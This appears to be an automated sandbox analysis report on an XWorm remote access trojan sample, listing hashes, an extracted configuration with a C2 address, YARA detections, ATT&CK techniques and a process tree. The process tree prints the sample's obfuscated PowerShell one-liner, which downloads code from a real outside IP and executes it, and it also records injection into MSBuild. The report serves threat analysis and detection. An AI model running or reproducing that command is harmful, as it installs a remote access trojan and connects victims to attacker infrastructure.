xworm | 2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a

General

Target

185.7.214_1.211.cmd
Size

172B
MD5

e3f9c42a3eee3a73f89685a8c2cc027e
SHA1

9d934754caf36aeb28f239f0011bedc4f68138f5
SHA256

2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a
SHA512

51d8caf7b1dad18417c236660e7c87b7bbf5a96b0bd78166eb3897b995938708767d1ad0e32250dc246d88f40838e228154d7028ecf708e4b54fea7f0fde57a9

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.211/a.mp4

Extracted

Family

xworm

Version

5.0

C2

185.7.214.211:4444

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/memory/4816-26-0x000002990A7C0000-0x000002990A7D0000-memory.dmp	family_xworm
behavioral2/files/0x000200000001e726-25.dat	family_xworm
behavioral2/memory/2024-28-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	4816	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4816	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4816 set thread context of 2024	4816	powershell.exe	96

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	2024	MSBuild.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 4240 wrote to memory of 4816	4240	cmd.exe	85
PID 4240 wrote to memory of 4816	4240	cmd.exe	85
PID 4816 wrote to memory of 372	4816	powershell.exe	91
PID 4816 wrote to memory of 372	4816	powershell.exe	91
PID 372 wrote to memory of 1328	372	csc.exe	93
PID 372 wrote to memory of 1328	372	csc.exe	93
PID 4816 wrote to memory of 2800	4816	powershell.exe	94
PID 4816 wrote to memory of 2800	4816	powershell.exe	94
PID 4816 wrote to memory of 2800	4816	powershell.exe	94
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96
PID 4816 wrote to memory of 2024	4816	powershell.exe	96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\185.7.214_1.211.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\toxabkak\toxabkak.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA75C.tmp" "c:\Users\Admin\AppData\Local\Temp\toxabkak\CSC3FF7BDFFDE224970AA90AFBC437B6EAD.TMP"
      4⤵
      PID:1328
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2800
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA75C.tmp

Filesize
1KB

MD5
a50acfaac5dcafa4f225c2eceeefa698

SHA1
9ddb24fe03cd5d7b984588f6e8f4065f3672cd1c

SHA256
27a9947531f12e357fdccc400797a4891b1cfc8a636d2700afea0ad8a51d3133

SHA512
8762ddc722115fcecc48daa99d53e9bf3e1e46f556e8fbed17449aad3e4eb8006b028dca06573e106b09269f5f8f77fff0fb4c5c07d0ffe41687720f9924f7e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdh5c35w.fra.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\toxabkak\toxabkak.dll

Filesize
41KB

MD5
0b08dff8e9005f197341b6528d33c4cf

SHA1
3b621bd1ad94151957d21dcad2efa9759b147730

SHA256
e04c47f1e1a2fc163bd79161341044b3315c2ff89002365a868e3358dc6fbb4c

SHA512
7b83b5bdd20f79b2462f713a53aadefa5ed6a3245f974657950882bfae376ead6b7b7cbd45d25bf2daddfded57578f91fa98a4e4a03ca537a45f9e3f967ca0ab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\toxabkak\CSC3FF7BDFFDE224970AA90AFBC437B6EAD.TMP

Filesize
652B

MD5
4728aa625a09250d90bfa4bde7ccf525

SHA1
7eeafdbbf0f530d911002fcfa3eedd3e63be0238

SHA256
b778842363cf7f42e5094be9da42240e128c246a180a1ae89ee08377d068a871

SHA512
369320f0971bce50765f3178ae1e1bb7f878292fdab85d7558f409befab5476418fb718fcffac134696a56db27ca6cc0526b07d74c116065d6c1d655c1a3a69f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\toxabkak\toxabkak.0.cs

Filesize
101KB

MD5
cba2847534e58636a5292dc393b45fdd

SHA1
ffd2fc63507cfee641ba53038d3f017a6ededbee

SHA256
33561d11060d90e7a1d49d19e395fd943c2500af98521412d2390b43b6cec6bd

SHA512
1b9bd2957ffe364788abcca1d90f2deb4634c89eea0a07e6a203573ed606df95b3e28ce41de038badaef674b2a8606fb8370abb3d9697b45f80f82d5e89ec1d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\toxabkak\toxabkak.cmdline

Filesize
204B

MD5
c29d1cf41361bea71b2536736243bb4c

SHA1
b4efe9a16ffcc5122bf8225a7e08d5c858af5f98

SHA256
fb9b20294474f193ca7976cb3c0921d0298a7f295e4c493a8ba1e58a273f9285

SHA512
b8ef50a71f071d0ce5ba18a6633a6b33ab0485f9a4e27106b5861a66be0f2961a4fd215ae1256b75056c445688ec1300b6b877a15be6b1941449edef5bdc0da1

Download Submit
memory/2024-28-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2024-32-0x00000000050F0000-0x000000000518C000-memory.dmp

Filesize
624KB

Download
memory/2024-33-0x00000000058E0000-0x0000000005946000-memory.dmp

Filesize
408KB

Download
memory/2024-34-0x0000000006410000-0x00000000064A2000-memory.dmp

Filesize
584KB

Download
memory/2024-35-0x0000000006A60000-0x0000000007004000-memory.dmp

Filesize
5.6MB

Download
memory/4816-13-0x0000029924BD0000-0x0000029924C24000-memory.dmp

Filesize
336KB

Download
memory/4816-12-0x00007FFB8DDA0000-0x00007FFB8E861000-memory.dmp

Filesize
10.8MB

Download
memory/4816-11-0x00007FFB8DDA0000-0x00007FFB8E861000-memory.dmp

Filesize
10.8MB

Download
memory/4816-26-0x000002990A7C0000-0x000002990A7D0000-memory.dmp

Filesize
64KB

Download
memory/4816-10-0x000002990A790000-0x000002990A7B2000-memory.dmp

Filesize
136KB

Download
memory/4816-0-0x00007FFB8DDA3000-0x00007FFB8DDA5000-memory.dmp

Filesize
8KB

Download
memory/4816-31-0x00007FFB8DDA0000-0x00007FFB8E861000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads